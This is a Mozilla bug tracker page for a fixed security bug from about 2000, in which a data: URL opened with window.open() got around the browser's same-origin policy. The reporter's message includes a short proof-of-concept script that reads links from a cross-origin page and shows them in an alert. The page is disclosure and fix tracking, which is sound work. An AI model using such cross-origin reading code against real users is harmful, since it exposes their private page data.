Closed Bug 48723 Opened 24 years ago Closed 24 years ago

Principal not updated when window is reassigned with window.open

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: security-bugs, Assigned: security-bugs)

Details

(Whiteboard: [nsbeta3+])

This is similar to 47670 but I've fixed that one and this one is not resolved. From: Georgi Guninski <joro@nat.bg> To: Mitchell Stoltz <mstoltz@netscape.com> The data: protocol allows circumventing same origin security policy using window.open() The code is: ---------------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com","a"); function f() { window.open("data:text/html;,data2<SCRIPT>b=window.open('http://www.yahoo.com');msg='The first links is: ';setTimeout('alert(msg+b.document.links[0].href)',3000)</"+"SCRIPT>","a"); } setTimeout("f()",3000); </SCRIPT> ---------------------------------------------------- As with 47670, we need to assign the correct principal to the window when its content is changed using window.open("new url","target"). This works for a data: URL because it's inheriting its principal; only the referrer is wrong, it should be the script principal rather than the previous page loaded in that window.
nsbeta3 for exploit.
Status: NEW → ASSIGNED
Keywords: nsbeta3
m18.
Target Milestone: --- → M18
Marking nsbeta3+.
Whiteboard: [nsbeta3+]
Fix checked in.
Really this time.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.